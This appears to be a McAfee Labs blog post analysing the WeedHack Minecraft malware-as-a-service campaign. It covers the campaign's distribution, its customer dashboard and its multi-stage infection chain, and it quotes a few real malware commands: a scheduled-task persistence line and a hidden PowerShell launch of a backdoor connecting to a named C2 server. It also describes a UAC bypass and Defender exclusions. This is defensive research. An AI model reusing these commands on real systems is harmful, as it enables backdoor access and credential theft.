Game Over: WeedHack – The Rise of Minecraft Malware-as-a-Service Campaigns

Authored by Aayush Tyagi 

Introduction  

Minecraft is a 2011 sandbox game developed and published by Mojang Studios. It is the best-selling video game in the world and has sold over 350 million copies worldwide. Its popularity has spanned over a decade due to its versatile gameplay, offering multiple game modes, including one of the most memorable Story Mode in gaming history.

It allows players to create and host multiplayer servers with a variety of gameplay options and offers a wide range of custom launchers, game mods, and cheats to choose from.

Its massive popularity and widespread use of third-party tools have also given rise to a dark side of the Minecraft ecosystem, which is filled with Remote Access Trojans (RATs), credential stealers, keyloggers and other malware threats.   

McAfee Labs has recently uncovered a colossal Minecraft-focused Malware-as-a-Service (MaaS) campaign named ‘Weedhack’, that allows threat actors to remotely access and manipulate the victims’ screen, webcam and file system through a dashboard hosted on the clear net, making it easily accessible to anyone with a Discord account and an internet connection. 

Key Findings 

• ‘Weedhack’ has been active since January 2026 and masquerades as genuine Minecraft clients and mods to infect users.
   
• We’ve discovered over 3820 unique malicious JAR files that are part of this attack and over 240 URLs responsible for distributing this malware. 
• This campaign utilizes SEO poisoning and YouTube to generate traffic to these malicious URLs. We also found two YouTube channels and multiple videos that demonstrate Minecraft Mods and Clients and redirect viewers to these URLs.
• The campaign has accumulated a total of 116,464 hits, averaging approximately 2000 to 3,000 hits per day.
• The campaign provides an enterprise-grade dashboard that allows customers to view stolen credentials and system information, download the payload, configure notifications, access tutorials, and remotely monitor their victims. 
• This campaign deploys EtherHiding, a technique that uses Ethereum blockchain to fetch its latest C2 domain. The responses are RSA-signed and verified before execution, helping protect the network from campaign takeover attempts.
• We’ve uncovered 10 domains that host the next stage payloads and host the malware dashboard for the Weedhack campaign. 
• We’ve identified 11 domains that hosted similar MaaS campaigns in the past, orchestrated by the same threat actor. 
• We’ve unearthed the threat actor’s Telegram account and uncovered a Telegram channel for customers, with over 850 members, as of writing this blog.
• This campaign offers two service tiers: free and premium. 
• The free tier includes a comprehensive infostealer capable of targeting Minecraft session IDs and four Minecraft launchers, collecting system information, and stealing cookies and passwords from 36 different browsers. It also targets 56 browser-based crypto wallets and 12 desktop crypto wallets, along with Discord, Steam, and Telegram credentials. It can search for files using 24 different keywords and includes screenshot capture capabilities.
• For premium users, with subscriptions starting at $5 per month, it offers additional remote-access capabilities such as webcam access, keylogging, reverse shell execution, screen sharing with keyboard and mouse access, and file management features for uploading and downloading files. 
• While monitoring the Telegram channel, we found that WeedHack malware is a major catalyst for cyberbullying. Many of its customers appear to be teenagers and young adults and are using remote access capabilities to threaten, harass and monitor their victims, which are around the same age.
  

Take control with McAfee+ Advanced

Full-service identity and credit protection now in one plan

Get McAfee+ Advanced

Attack Vector 

Weedhack Campaign primarily relies on YouTube-driven distribution and SEO poisoning to infect its victims. The campaign provides a tutorial on both methods, on its dashboard, to educate its customers on how to effectively implement these methods with optimization techniques, target selection, common pitfalls, and how to avoid them.  

YouTube Spreading  

Weedhack considers YouTube as one of the best platforms for spreading malware. They recommend users create a well-edited video, with overlays and background music and avoid using AI-generated content in them, claiming that high-quality videos can generate consistent traffic for months. 

These videos target specific Minecraft keywords and places download links in both the description and in the comment section for more visibility (Figure 2, highlighted in red).  

Threat actors also actively try to manipulate their victims, as we identified comments claiming that the downloaded files are legitimate software and not malicious. (Figure 3, highlighted in green) 

In this second example, the video provides a tutorial for a Minecraft mod. Here, a voice-over narration is added to the video to make the video appear more legitimate. It has gained over 7,500 views (highlighted in red) and has a link to the malicious website in the description (highlighted in green). 

SEO poisoning 

Weedhack targets Minecraft clients and mods without an official website that are hosted exclusively on file hosting websites like GitHub and specifically select mods with unique names, so it is easier to dominate search engine results. 

They’ve actively targeted the following Minecraft clients: 

Meteor Client, Radium Client, Wurst Client, Aristois, LiquidBounce, Impact Client, Future Client, Inertia Client, Cornos Client, WWE Client, 3arthh4ck, Salhack, Phobos, Gamesense 

They recommend customers participate in Discord and Reddit discussions to promote their website, without directly associating with it, to maintain legitimacy. These methods redirect users to genuine–looking websites that are used to distribute Weedhack. 

In the above instance (Figure 6), the threat actor is hosting his website on ‘lovable.app’ platform. They offer eight Minecraft tools, such as Radium Client and Dupe Mod, and all of them are malicious. 

Similarly, we encountered another website (Figure 7) offering an item duplicator game mod, which is also spreading Weedhack malware. 

In the final example (Figure 8), this website has included a Security Warning (highlighted in red), stating that users should only download ‘Skytils’ from their site, claiming it is the official website and that no other websites are affiliated with the project. It also links to the official ‘Skytils’ Discord server and GitHub repository under the community section to appear trustworthy. In reality, it is another website that distributes WeedHack. 

Geographical Prevalence 

McAfee has observed that Weedhack is most prevalent in The United States of America, followed by Germany, India, United Kingdom, Italy, Vietnam, Canada, Norway, Sweden, Finland and Spain. 

Why Does It Matter and Am I Protected? 

One of the key features that makes Weedhack unique is that it is hosted on the clear net and provides access to sophisticated malware for free. Typically, Malware-as-a-service campaigns, such as Lumma Stealer, range from $250 to $500 per month and are accessible through underground channels, such as the dark web and Telegram channels. Similarly, X-worm samples also cost between $300 and $500 for a lifetime subscription. Weedhack on the other hand, offers the malware for free, with premium features starting at $5 per month, and $24.99 for lifetime access.  

This difference in cost and ease of access with detailed tutorials on how to use the malware significantly reduces the barrier to entry for prospective customers. Furthermore, its ability to steal Minecraft accounts attracts a younger audience. Both of these factors complement each other and make the campaign much more lethal. 

Another unforeseen and unfortunate consequence of this campaign is that it facilitated cyberbullying. We encountered multiple instances where the threat actors reached out to their victims to threaten and harass them. They recorded victims via their webcams and shared the videos on the Telegram channel as cybercrime trophies.  

At McAfee Labs, we have been actively hunting for such malware campaigns, so you don’t need to worry. But it always helps to be informed and educated about the latest threats in the threat landscape and how to protect yourself and your loved ones against them. 

Malware Dashboard  

The dashboard is currently hosted on ‘hxxps://weedhack.to/dashboard/auth/login’. We identified 10 URLs that are part of this campaign and hosted the dashboard earlier. As older URLs are getting detected, threat actors are actively deploying new domains. 

The Dashboard allows users to view their statistics, total hits, and session hits. Every hit contains system information, such as CPU, GPU, RAM, OS, IP address, User and PC name along with a screenshot of the victim’s screen and execution environment of the malware. Within this section, it provides access to all stolen credentials exported from a victim’s PC. 

Session hits on the other hand, only include Minecraft session IDs, used for Minecraft account hijacking. 

Weedhack maintains a leaderboard for its customers with All-Time hits and 24-hour hits. Total campaign hits have reached over 116,464, and the leaderboard is refreshed every 10 minutes. 

Weedhack includes a Build section that allows customers to create custom payloads that can target Minecraft versions 1.21.0 to 1.21.11. This section also allows customers to inject the malware into legitimate Minecraft mods, tricking users into believing the mod is functioning as expected. 

Customers get access to an elaborate tutorial section on the dashboard that covers a wide range of topics, such as:

• How to use the Dashboard. 
• How to use the Remote Access Section. 
• How to use the stolen Discord Tokens, Cookies and crypto wallet credentials.  
• Recommendations for VPN and residential proxy services with setup instructions. 
• OPSEC Guidelines  
• Tutorial on Malware distribution techniques, such as SEO Poisoning and YouTube Spreading. 
• An FAQ section that covers common queries and provides basic troubleshooting guidance. 

Weedhack also offers a Suggestion section, where customers can submit feature requests or vote on current suggestions. Current leading suggestions on the platform include –  

• Jump scare functionality 
• Adding ransomware  
• Microphone access 
• Support for more Minecraft clients  

Weedhack offers 4 payment options. They accept payments in Bitcoin and Litecoin. For every new payment, a new crypto wallet is created, so it is difficult to track wallet IDs associated with the campaign.  

They provide an extensive side-by-side comparison of the free and premium features.  

After purchasing the premium subscription, customers get access to the Remote section, where they can use features such as webcam access, keylogging, reverse shell, and other remote-access capabilities

Additionally, the camping has a settings tab, allowing users to configure telegram and discord notifications for new hits and anti-spam controls, where they can disable notifications based on IP addresses, usernames, UUIDs and other criteria. 

Weedhack has moved away from Discord as a communication platform and uses Telegram exclusively for communication. 

This channel is used for broadcasting updates regarding the Weedhack campaign. It allows customers to directly reach out to the threat actor, in case they encounter any serious issues. Weedhack has attracted significant attention due to its high infection counts.  

This popularity caught the eye of the threat actor himself, who posted a screenshot of WeedHack appearing in the top 10 malware families on the Telegram channel (highlighted in red). 

While monitoring this channel, we observed that most of the customers are teenagers and they’re using this malware to steal Minecraft accounts. They use this channel to post images and videos of themselves harassing their victims as spoils of cybercrime. 

Ironically, most of these customers lack real malware development skills. In light of the sensitive nature of the issue, and since most of the victims are underage, we have opted not to share evidence collected from the Telegram channel, in order to protect the privacy of the victims.  

The telegram channel has been taken down, and we are continuing to monitor any new channels that may be established by the threat actors for further communication.  

Technical Analysis 

Once the victim downloads the infected file from one of these websites, they are presented with a JAR file. Many legitimate Minecraft mods are commonly distributed as JAR files. 

These jar files can be executed directly or loaded via Minecraft. 

Stage 1 Payload – DonutDupe.jar 

On execution, this jar file relaunches itself via javaw.exe, to avoid having a visible console window, unlike java.exe. 

Next, this malware reads the API version from “fabric.api.json” file, located in the same jar file. This value is unique for each Weedhack customer and is used to identify the threat actor who has infected the victim. 

Next, the malware decrypts a list of Ethereum JSON-RPC server domains at runtime using a custom string decryption function. These servers act as a bridge between the client and the Ethereum blockchain, where they can query data stored on the blockchain without changing it. 

It also decrypts an Ethereum smart contract address, a function identifier, and an embedded RSA public key, using the same decryption function. 

This sample contains 32 Ethereum JSON-RPC endpoints, which are then used to query the smart contract. If one endpoint is unavailable or unresponsive, the malware automatically falls back to the next server in the list.

After decoding the contract response, malware receives the C2 server (Figure 26, highlighted in red) appended with the RSA signature.

Once the signature is verified, the malware contacts the C2 server to fetch the Stage 2 payload. This payload is downloaded as raw bytes and is unpacked entirely in memory. The payload is separated into Java class files and resource files, which are loaded directly into memory using a custom Class Loader. 

Then, the malware locates the “dev.majanito.Main” class in Stage 2 payload, instantiates it through reflection, and invokes the “initializeWeedhack” method. 

Stage 2 Payload – Elevator.jar 

From here on out, we observe a change in obfuscation techniques. Stage 2 and the subsequent JAR payloads, namely Stage 3 and Stage 4, are protected using JNIC. 

JNIC is a Java native obfuscator that translates compiled java bytecode into native C code and links that code back to the original java application using Java Native Interface (JNI).
At the end of the process, original bytecode is completely hidden, and a highly obfuscated native DLL is created that contains the execution logic. 
This tool also provides a strong string obfuscation feature, which is also used by Weedhack to hinder analysis. License for JNIC costs between £150 to £300, and it significantly reduces the execution speed for the java applications, as a tradeoff for enhanced anti-reversing capabilities.  

“dev.majanito.Main” class has a static block (Figure 28, highlighted in red) that executes first. It checks the Windows processor architecture to determine whether the system is x86 or AArch64. Then it decompresses the appropriate native DLL containing the execution logic using a manually implemented LZMA2 decompression routine and drops it in the temp folder.  

Then, using JNI’s RegisterNatives function, it maps the java functions, such as ‘initializeWeedhack’ (Figure 28, highlighted in green) to their native implementation.  

Next, the malware performs the UAC bypass by leveraging CMSTP. It creates the following Windows INF installation script in the temp folder and executes it via “cmstp.exe”. 

This instruction executes a VBS script (highlighted in red), which silently relaunches the Stage 2 payload via ‘javaw.exe’ with the following parameters. 

{“executionEnvironment”:”DoubleClick”,”userId”:”9f8f4647-f48d-45f7-acf4-cf8ee5f0bb6f”} 

Here, the ‘userId’ value is the same API version from ‘fabric.api.json’ mentioned earlier. 

Next, the malware drops and executes ‘WinDefConfig.cmd’ from the temp folder. 

This bash script adds 13 exclusion paths and 15 exclusion processes, which are later used by next stage payloads.  

Once the exclusions are added in windows defender, the malware executes the following set of commands. 

The first set of commands (highlighted in red) are used to collect host information, namely the OS name, CPU and GPU details, and the total RAM.  

The next command (highlighted in green) is used to scan and display nearby Wi-Fi networks, which could allow threat actors to infer victim location and classify the network type. The last command (highlighted in blue) is used to query Mullvad VPN account information.  

Along with this, the sample takes a screenshot of the victim’s screen, steals discord tokens, browser cookies and passwords using ‘chromedriver.dll’ dropped in the following path. 

‘C:\Users\admin\AppData\Roaming\ChromeDriver’  

The malware then downloads the SQLite JDBC driver from Apache Maven and creates a database containing all stolen credentials and sends it to the C2 server. For connecting to the C2, malware uses the same Ethereum JSON-RPC technique we discussed earlier, with the same set of values. 

Afterwards, the malware downloads stage 3 payload called ‘SecurityManager.jar’ in the following path
C:\Users\admin\AppData\Roaming\Microsoft\SecurityUpdates\SecurityManager.jar
and executes it via javaw.exe. 

Stage 3 Payload – SecurityManager.jar 

Stage 3 payload acts as a stager for the final payload named ‘Components.jar’. 

This jar file creates a run key registry entry using the following code. 

Then it creates a scheduled task entry using this command.  
schtasks /Create /TN “JavaSecurityUpdater” /SC ONLOGON /TR “C:\Users\admin\AppData\Roaming\Microsoft\SecurityUpdates\Updater.vbs” /RL HIGHEST /IT /F 

This task executes ‘Updater.vbs’ when the user logs in and with the highest privileges. 

Here, the updater.vbs is similar to elv.vbs we saw earlier. It runs SecurityManager.jar using javaw.exe. 

Next, the malware adds the entire ‘C:\Users’ folder as an exclusion in windows defender and downloads the stage 4 payload, in the following path, 
C:\Users\admin\AppData\Roaming\Microsoft\SecurityUpdates\component.jar 
and executes it via ‘javaw.exe’. 

Stage 4 Payload – Component.jar 

The stage 4 payload deploys the remote access features of the Weedhack campaign. 

RuntimeBroker.exe 

The payload drops RuntimeBroker.exe in the following folder 
C:\Users\admin\AppData\Roaming
and executes it with the following commands.
Start-Process -FilePath ‘C:\Users\admin\AppData\Roaming\RuntimeBroker.exe’ -ArgumentList ‘–server wss://remotev2.whpayment.ru /ws/client –user-id 9f8f4647-f48d-45f7-acf4-cf8ee5f0bb6f –debug’ -WindowStyle Hidden” 

Here, this malware operates as a backdoor and connects to the same C2 server as seen previously. This sample is responsible for the remote desktop and webcam access promised by the Weedhack campaign. The user ID has the same value used to identify the actor responsible for infecting the victim, which we’ve seen earlier.  

This sample also executes the following commands. 

The first 3 set of commands (highlighted in red), checks whether a firewall rule named ‘Runtime Broker’ already exists, then creates two additional rules that allow incoming and outgoing traffic for the same ‘RuntimeBroker.exe’ malware. 

Next, the malware creates another scheduled task (highlighted in green) named ‘JMonitoringTask’, which runs ‘JavaSecurityUpdater’ scheduled task created by Stage 3 payload every two minutes. This watchdog-style mechanism provides advance persistence by repeatedly restoring and executing the Stage 4 payload whenever components are removed or disrupted. 

Finally, the last set of commands (highlighted in purple) creates two firewall rules that allow incoming and outgoing traffic for the legitimate ‘javaw.exe’ file. This enables the threat actor to remotely execute Java code through a whitelisted process. 

Telemetry.exe 

The second payload is dropped in the following folder
C:\Users\admin\AppData\Roaming\Microsoft\Tlmtry 

This sample is an infostealer, that searches for telegram and crypto wallet credentials.  

It copies itself to the ‘C:\Users\admin\AppData\Roaming’ folder under the name ‘WindowsRunetimeBroker.exe’ and creates a new schedule task to maintain persistence, using the following command.  

This command runs the sample every five minutes and with no execution time limit. The collected data is then transmitted to a separate C2 server, namely ‘telemetrydata.to’. 

Indicator of Compromise(s)  

McAfee has extensive coverage for Weedhack Malware Campaign. We’re proactively covering new samples observed in the wild. 

Trojan:Win/Weedhack.AA Trojan:Win/Weedhack.AB 

Trojan:Win/Weedhack.AC Trojan:Win/Weedhack.AD 

Trojan:Win/Weedhack.AE Trojan:Script/Weedhack.AF